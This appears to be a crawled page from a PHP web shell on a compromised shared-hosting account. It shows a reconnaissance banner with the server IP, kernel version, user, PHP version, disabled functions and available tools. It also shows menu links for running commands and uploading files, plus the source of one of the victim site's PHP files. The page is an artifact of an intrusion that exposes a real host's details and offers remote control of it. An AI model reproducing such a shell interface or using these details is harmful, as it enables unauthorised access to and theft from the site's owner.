|
Server IP : 10.111.40.2 / Your IP : 216.73.217.145 Web Server : Apache System : Linux webd002.cluster111.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : comimage ( 586) PHP Version : 7.4.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/comimage/referencements.comimage/../batimonte.com/themes/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
require(dirname(__FILE__).'/../inc/tools/configuration.php');
if($_POST['idrep'] > 0 && !empty($_POST['c'])){
$rep_id = minuscule($_POST['idrep']);
$input = minuscule($_POST['c']);
echo $metier->listerIbrowserParRepertoire($bdd,$rep_id,$input);
}